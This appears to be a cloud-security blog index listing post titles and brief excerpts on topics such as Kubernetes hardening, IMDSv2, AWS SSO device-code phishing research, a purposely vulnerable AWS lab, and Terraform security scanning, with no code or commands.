Kubernetes’ ‘allowPrivilegeEscalation’ is a useful but poorly understood security hardening setting. Let’s dive into how it works and debunk some common myths about it.
IMDSv2 enforcement: coming to a region near you!
A Tribute to Hadrien Milano
MitM at the Edge: Abusing Cloudflare Workers
Introducing Stratus Red Team, an Adversary Emulation Tool for the Cloud
Implementing a Vulnerable AWS DevOps Environment as a CloudGoat Scenario
I’m a huge fan of disposable security labs, both for offensive and defensive purposes (see: Automating the provisioning of Active Directory labs in Azure). After writing Cloud Security Breaches and Vulnerabilities: 2021 in Review, I wanted to build a “purposely vulnerable AWS lab” with a typical attack path including static, long-lived credentials and with a supply-chain security element.
Cloud Security Breaches and Vulnerabilities: 2021 in Review
Phishing for AWS credentials via AWS SSO device code authentication
When using AWS in an enterprise environment, best practices dictate to use a single sign-on service for identity and access management. AWS SSO is a popular solution, integrating with third-party providers such as Okta and allowing to centrally manage roles and permissions in multiple AWS accounts. In this post, we demonstrate that AWS SSO is vulnerable by design to device code authentication phishing – just like any identity provider implementing OpenID Connect device code authentication. This technique was first demonstrated by Dr. Nestori Syynimaa for Azure AD. The feature provides a powerful phishing vector for attackers, rendering ineffective controls suchContinue reading… Phishing for AWS credentials via AWS SSO device code authentication
Retrieving AWS security credentials from the AWS console
Shifting Cloud Security Left — Scanning Infrastructure as Code for Security Issues (last updated August 2023)
In cloud environments, companies usually describe their infrastructure as code using tools like Terraform or CloudFormation. In this post, we review the landscape of tools that allow us to perform static analysis of Terraform code in order to identify cloud security issues and misconfigurations even before they pose an actual security risk.